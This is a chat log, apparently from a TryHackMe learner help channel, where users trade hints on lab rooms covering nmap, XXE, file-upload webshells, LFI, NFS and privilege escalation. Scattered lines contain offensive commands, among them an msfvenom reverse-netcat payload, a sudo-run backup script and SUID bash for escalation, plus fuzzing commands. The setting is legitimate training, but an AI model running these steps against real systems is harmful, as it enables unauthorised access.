Is it normal for nmap scans using -p- to take a considerable amount of time?
Yes. But you can speed that up with -T4 and should be no issue with THM machines
Thanks for the tip!
Gave +1 Rep to @left thunder
Anyone can help me on NahamStore Task 10 Blind XXE? Thanks very much.
I couldn’t get it to work either, what I did was create a separate python web service and redirect the xxe to go there, hope this helps!
in burp suite room, task 11. having trouble finding a score board on the OWASP juice website or any options that add the mentioned scope locations. any ideas where i'm messing up?
disregard, i did the prior parts of the room on an earlier machine and did not do the challenges (leaving a 0 star review, etc) when creating the new site map on this machine
Tried running this and it just returns the math and not the flag am I missing something? Print(21 + 43)
In the code editor, print the result of 21 + 43. What is the flag?
Can you give more context please? What room/task/question is this for?
@wheat helm Oh, sorry. Sorry python basics task 3 question 1.
Nevermind, figured it out
Hey Finally, I know how to play Blind XXE in xlsx file. Yeah 😆
Thanks @terse eagle
Gave +1 Rep to @terse eagle
you will have to either download/copy the public key into .ssh, or generate it with ssh-keygen -y -f id_rsa > id_rsa.pub
@rigid grove this should solve your error
in the particular situation i was in, (reading it from the box) that wouldnt work but thats probably gonna help me anyways so thanks! Ive moved on from that box tho, so its fine. It seems to work on every other box so i think it might be a one-off
Gave +1 Rep to @lost canopy
Hello. in the content discovery, task 2, I click on the link in the description pane but the link opens locally but inaccessible. If I start in the machine, it does not open either. what shall I do ?
Are you using the attackbox or your local machine ?
I am using attackbox
Then either open the tryhackme room page directly inside your attackbox (only possible if you are sub). Or simply copy the link address, paste it to the attackbox and open the target machine link inside the attackbox
Whaou, I think this is what I did already. I trying again...
I typed manually as I don't know how to paste the link between my local browser and the machine...
Use the copy paste clipboard in between the split view.
Okay !!!
okay !!!
robot.txt is displayed, now! thanks !
Gave +1 Rep to @left thunder
Anyone started the thief room? It was created today.
hile uploadvulns exercise 9 magic number.
*file
I've been able to upload the hex modified payload. I do not get how to navigate to the webshell with the uri???? ie with directory indexing off.
Did you try to run a directory enumeration to find the upload directory ?
I get this error i thought it was part of the challenge : Error: error on running gobuster: unable to connect to http://magic.uploadvulns.thm/: Get "http://magic.uploadvulns.thm/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
But you can navigate to the page itself in your browser ?
yes
If you're sure your gobuster command was correct, check your /etc/hosts file if you have duplicates in there and get rid of them, so that only the current target machine IP and the host names for that machine are left
ok
thanks @left thunder I am using kali on docker on my windows machine i had to update ip on my kali /etc/hosts. I am able to get enumeration now, how do i reference my webshell with context indexing off?
Gave +1 Rep to @left thunder
Is it really a webshell or a reverse shell? But either way. http://magic.uploadvulns.thm/NameOfUploadFolder/NameOfYourShell
I prefer using a webshell. hmm pretty straightforward. They gave me a forbidden access for the upload folder, and i thought i could not access the file as well. Thanks
thanks again @left thunder
Gave +1 Rep to @left thunder
!d bump
Hi guys, i have a general question and i'm not sure where it belongs
What would you recommend to do after completing complete beginner and jr. Pentester pathway?
I personally would go for the Web Fundamentals path
Thanks a lot :)
And after that? I think the path only has a few modules that are not in jr. Pentester or complete beginner. Should i just try and practice with offensive pentesting pathway?
Gave +1 Rep to @left thunder
Tbh it depends what you prefer, but if you are not up to analysis and defence that much, then the offensive pentesting and comptia pentesting paths anyways the only ones left 🙂
I'm actually not sure, since i'm so new in hacking. Maybe i'll just keep trying, learning and poking around and see what i like most :) thanks for the help
room: dogcat
why still no. 3?😑
last flag is still left even after getting the root🤦
working on this room since last 2 days😄 .....simply loved it❤️
yeah, it must be....didn't need help...just wanted to express how I felt not getting the last flag inside /root🙆♂️
no, I don't
thanks for asking though
I had a doubt in fact
just a min
sure
while I was trying out payloads to get rce from lfi, I used this command 1st as it's given here.......notice that \ before $
and I got this error
later I dropped that \ used for escaping $ but I had to get new IP to reset everything
wasn't there any other way to get rid of this error?
it persisted in every subsequent request I sent after this command since it was saved in the access.log
the error was in the access.log.....later I reset the machine and didn't use \ and so the command worked for me
yeah
but wasn't there any other way to resolve the error rather than resetting the machine is my question....
but that will only work if \ isn't already inside access.log
once it is
what to do other than resetting the machine
Good morning all. I am attempting the priv esc in Vulnversity. I've almost gotten one technique to work but not sure if I am on the track. I can provide details of what I've done thus far. Any thoughts or ideas would be appreciated.
exactly
got that error several times while testing after I got the RCE (trying out for reverse shell)
the reason for the error isn't just restricted to using \
Could I get some help here. Python basics, task6, question 2. What did I do wrong?
```
shipping_cost_per_kg = 1.20
customer_basket_cost = 34
customer_basket_weight = 44
if(customer_basket_cost >= 100):
    print('Free shipping!')
else:
    shipping_cost = customer_basket_weight * shipping_cost_per_kg
    customer_basket_cost = 44 * 1.20
print("Total basket cost including shipping is " + str(customer_basket_cost))
```
Hi there,
at line 9
The customer_basket_cost would be shipping_cost+customer_basket_cost instead of 44 * 1.20
Thank you. I don't know how I missed that.
Gave +1 Rep to @obtuse fjord
it happens😛
I assume you understood the concept now.
I am trying to. Knew the error was on that line. After thinking about it, the numbers were already given. I guess I didn't think it through enough.
but you were multiplying weight with shipping cost per kg which was done on line 8,
you should have added the value from above with customer_basket_cost instead.
Understood. Thank you for the clarification.
Gave +1 Rep to @obtuse fjord
hi
I am in
Network Services
Task 6 - the telnet part
I first did
"nmap <the_ip>"
all were closed, so now I tried doing
"nmap <the_ip> -p-" to scan all, but this will take forever, so I was thinking about if this is the right step orr?
if they all showed up as closed you could try -Pn ....or to speed up the -p- scan you could slap on --min-rate=10000 or some abysmal number, but that could result in some missed ports, just be aware of that possibility
XD ARIGATO !!
lmao, been waiting for the -p- to finish for like 15 mins, I used the --min-rate=10000 and now am done LoL
Based on the title returned to us, what do we think this port could be used for?
what title is it talking about?
hey I'm stuck in the file inclusion room task 5 question 4. could i get some help?
You're missing a flag or two for more details in your nmap scan results. check "man nmap" and try to find what could be useful
nevermind I figured it on my own! 
Intro to Django task2 when I run this command django-admin startproject {project_name} I get an error. Invalid project name. I tried making up one and still got the error. any help is appreciated.
I'm in the Username Enumeration room and i am just unfamiliar with how to save my ffuf command as a .txt file...(I've guessed all the usernames tho) but i want to make sure i have the file for the rest of the exercises.
nm figured it out 🙂
Hello, am working on zthobscurewebvulns: task 22, and I can't get my payload to work,
I have tried using the entity created on every element but nothing is working, can anyone point out what I'm doing wrong?
i worked it out, just a simple mistake
Hi, I was working on the marketplace room. I have managed to get the initial foothold, but was unable to laterally escalate my privileges to the michael user. I have tried the wildcard injection for tar, but it's not working for some reason. Any help would be appreciated
doing the pickle rick room rn got to the login page but cant find any other leads
so no ssh needed for now, gobuster is still running
saw the robots.txt but didnt see anything that i thought would be anything
if i got the user i could prob use something like hydra right?
oh
hahaha
damnit
alright
lemme check the website pages again
alright
Used this command to get the payload -> msfvenom -p cmd/unix/reverse_netcat lhost=xx.x.xxx.xxx lport=4444 R
Was following this article only
And used as it is mentioned there
sudo -u michael /opt/backups/backup.sh
how do i set something as a spoiler again
Used this command to run the script but the shell is just not popping up on my netcat
got the ||index.html, robots.txt and login.php|| idk if those are all thats needed rn?
then what the hell am i missing XD
....
im so stupid
thanks very much
Yeah got it. I got so frustrated, that I didn't think about chmod, I was using chown, F.
Thanks 😄
Gave +1 Rep to @dusk totem
@white salmon is it right that i cant cd to locations with this command terminal?
i found the second one tho, but cant open it, or atleast dont know how to for now
it has no extension and cat doesnt work
wait
you can, it will go through, but it wont save your changed location again. each time you send a command it will reset your location to the default one.
if it has no extension it must be a dir
ahh like that
the dir theory wasnt right
hmm
the directory from which you issue a command will be static at all times, so you might want to chain commands together.
so try to use the pipeline?
ah ';' would work here then
got it, i was too stupid to use use ' ' for a space in file name
got that it was ascii text via file
do i need the ssh for the last one?
ooh, alright!!
Any hints or something for reading about the nmap commands (a one that is different than nmap.org, a one that looks better at least lol)
nmap -h or man nmap
In Network Services, Task 6, what exactly are they asking for in:
Based on the title returned to us, what do we think this port could be used for?
I'm not sure what you deem as better. I guess there is no site as detailed as nmap.org itself. But I don't know, so you might have to research that on your own, but the man page or nmap -h should provide you with enough infos.
If you conduct the correct scan, I guess you will know what they are asking for. So go for a more advanced scan on the open port you found
Working on it! 
@left thunder
I did
nmap <the ip> -p 8012 -sV
As I think -sV would help, but it's returning something very big, is that ok?
Any hints on what that extra parameter is?
Okay, within that "big" reply, you should be able to see what that port is used for 🙂
Extra parameter? You mean the -sV flag ?
other than the -sV orr thats what am supposed to use?
Ye, with the -sV flag you should be able to get the desired result. But you could send a screenshot of your scan result in here, in order for me to verify it worked properly as that machine sometimes is a bit finicky. Just delete it afterwards again or put spoiler tags on that screenshot
||checking if this is how you send a hidden msg||
oh i c
@left thunder is this what I am supposed to see?
Yup. Maybe the answer format confuses you a bit. So it's just what you can find in that result and put it in the answer like "a banana" or "a car" etc.
Found it XD !!!
btw,
|| S\x20BACKDOOR.\x20Type\x20.HELP\x20to\x20view\ ||
why does it look like its some address of folders or something?
I don't know unfortunately. But maybe consider putting that in spoilers too 🙂
wait one more question
@left thunder
Now I have seen that it's a ||backdoor||, how did I determine that it's a ||telnet port||?
what's meant by ||backdoor||
Hi Team, I dont know if someone can fire me over a hint (new to linux CLI btw). Trying to run the following command in Room Network Services 2 from the tmp/mount: mount -t nfs (IP) /tmp/mount -nolock. I am getting error 'can't find in /etc/fstab' any hints most welcome (figured it out ignore pls)
I am Network Services 1
XD
Haha yeh just finished that @slim violet
ofc
thanks!
Gave +1 Rep to @vernal plank
im doing the team room
seems like gobuster isnt giving anything useful and cant login to ftp anonymously
anyone got a hint on what i should do?
doing that with gobuster but its not giving much
icons and small is all im getting atm
ah hold on
never done that
thought they were the same thing
yeah i noticed now
XD
which tool do you suggest on kali?
do i need some wordlists or are those in the /usr/share/wordlist folder
@white salmon could you help me?
using -w /usr/share/seclists/fuzzing/fuzzing-boom.txt -u http://10.10.68.133/FUZZ
as command
|| gobuster vhost -u http://ip -w /usr/share/seclists/discovery/dns/<pick your poison>.txt || OR || ffuf -w subdomains.txt -u https://website.com -H "Host: FUZZ.website.com"|| I'm assuming you couldn't find the correct wordlist
hi i'm on upload vulns task 9, trying to upload a shell to magic.uploadvulns.thm. i have already changed the hex numbers to spoof a ||.gif|| file, verified by 'file' command, but when i attempt to actually upload the shell i'm getting a submit=failure / no file selected error, any ideas where i'm going wrong?
once again killing the machine / starting a new one fixed it, going forward i'll try that for my weird errors LOL
Quick question about the file inclusion room
I had to use 8 ../ to see etc/passwd
Is there any way to know how many times you have to go back in the directory or is just a shot in the dark
most of the time you don't know the directory structure of the host so doing enough of them ensures you're in the root of it.
Also, in the same room I'm using the command ssh -i id_rsa ||falcon||@ip and getting the error "load key invalid format". I've copy pasted the the rsa from source code and did chmod 600 so I dunno what the problem is
is the private key properly formatted ?
The end rsa private key isn't indented
it requires a newline at the end
And at the top?
should start with the key
May I send a picture of it?
yes but obscure the key and only show the relevant parts
hmm I think the space in front of begin and end is bothering ssh
Thanks a ton
Gave +1 Rep to @grave valve
you're welcome
sorted (: ty @white salmon
Hi. I'm blocked in the Network Services 2, Task 4 Exploiting NFS. I think my problem is to login with SSH
if you're having problems with ssh, you haven't completed task3 yet
I'm here:
And then i should do this:
Now, SSH into the machine as the user. List the directory to make sure the bash executable is there. Now, the moment of truth. Lets run it with "./bash -p"
I done task 3, but if i try it says:
cappucino@<ip> not admin, you set up a shared NFS with the user cappucino, the id_rsa was for cappucino
Ok. But i got this, and don't know where to search for the flag:
if you do a "whoami" you'll see you're root, if you did everything correctly... based on past experiences, where has the last flag been?
It's always there.. but there is not and i looked in the folders and can't find it:
- confirm which directory you're in right now, by doing ||pwd||
- which directory is the root flag located based on your experience?
thanks @flat juniper
i done linux basics but seems i should improve more. I get stuck in understanding basics
hello, i'm working on the uploadvulns room jewel challenge, and i'm able to get my file with a payload uploaded to the site, but it returns this error instead of activating a shell. also here is the response i'm getting in burpsuite when trying to load that file. any ideas where i'm messing up? i think it might be the payload itself, gonna search around for some others
To find what services are running on a machine using nmap, do I have to specify open ports?
What do you mean?
okay switched shells to one that i think is more suitable, figured out i probably need to use ||/admin|| to launch the file itself, and am navigating (i think correctly?) to the file by inputting ||../content/FILE.jpg|| but am getting "module not available". the page seems to hang and i do have a nc listener set up for the port listed in the payload, but no shell. any help with where i'm going wrong? pretty stuck rn
If you think you're on the right track but it's not really working out, there's also a possibility something broke and restarting the machine might be a valid option to try. based from what I remember about the room, you're spot on with your approach.
restarted the machine and still getting module does not exist 😦
okay i watched the walkthrough and i'm doing p much the exact same thing :/
Yes ofc, you can't have services running without ports opened. Services run on ports
Well maybe you meant it in a different way, but you can have services running without an open port. For example, cron is a service too but doesn't have to run on a port.
yea true , there are local services also. But since he talked about scanning and services i thought he refers to services & ports
There are UNIX Sockets as well, you get a socket file to interact with the service (no port is harmed here)😄
I'm stuck on something in https://tryhackme.com/room/linprivesc probably simple
in the walkthroughs when it gets to exploit-db everyone seems to be pulling a .c file straight from exploitdb but when I check it's just a .TXT of instructions
either they're not showing a conversion of some kind that happened before writing or making the video or I just don't know how to do it
If you are talking about task 5, searching exploit-db will give both .txt and .c files
So just keep looking different results on exploit-db or use searchsploit to see the file-extensions. You don't need to transform .txt to .c @dry scroll
🤦♂️ thanks, I was fighting the first search result hard and it was just the next one down
working on pickle rick CTF, in the enumerating stage. i'm running gobuster scans with different wordlists to try and find a login page to use what i think is the username/pw but i can not seem to find it. i've looked in source code / site map in burpsuite also. do i just keep trying different wordlists? would love some direction/hints 🙂
Try the medium wordlist
||directory-list-2.3-medium.txt||
i just found it with the ||seclist quickhits.txt|| wordlist, guess i just needed to keep persevering lol. thank you
Gave +1 Rep to @wheat helm
this one did not show ||login.php|| for me
Hey can anyone help me I'm having problems in one of the easier rooms.
we're always ready to help, it would be more beneficial for you to just post your issue, so that someone can get to you when they're free.
i cant reach my url
What task?
task 5
Are you connected to the VPN?
yeah
Can you share a screenshot please?
any help for Buffer Overflow?
Cross posting from #room-help. Hey, for Buffer Overflow, I have removed a bad char in my payload, but it still shows as a bad char. Example: Initially, a0, a1, ad, ae are the bad chars. I removed a0, restarted Immunity, ran exploit.py, ran the mona, and I now see a0, ad, ae as the remaining bad char. Am I doing it right?
need some help with the team room
im trying to change my host file but it doesnt wanna connect
||10.10.8.203 http://team.thm/||
ahhh got it, thanks
thx for the help back then with the fuzzing, im just picking up where i left off haha
so help please. Authentication bypass, task 2 when running command. I get error, No file/directory exists. Am I missing something?
ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.44.107/customers/signup -mr "username already exists"
first off, i cant help but which room?
Authentication Bypass
ahh right sorry didnt see that
@white salmon I don't remember supplying a word list. I probably missed a step some where.
@white salmon I do understand that. I was under the assumption that the wordlist was already installed on the Vm.
Are you on Task 3? I'm running into the same trouble. I can't find "valid_usernames.txt"
Ooof, I found my mistake. On Task 2 it tells you to create a file called "valid_usernames.txt"
For those who run into issues, do "vi <filename>"
Then use vi editor to add in the usernames found in task 2
Hey I have a question about nmap, on the THM. It's the first nmap room i think.
Perform a TCP SYN scan on the first 5000 ports of the target -- how many ports are shown to be open?
the answer is 5
but i only got 1 back on my scan
Can you give a screenshot of the command you ran? Also which room and task? I'll try to run through it and see what I get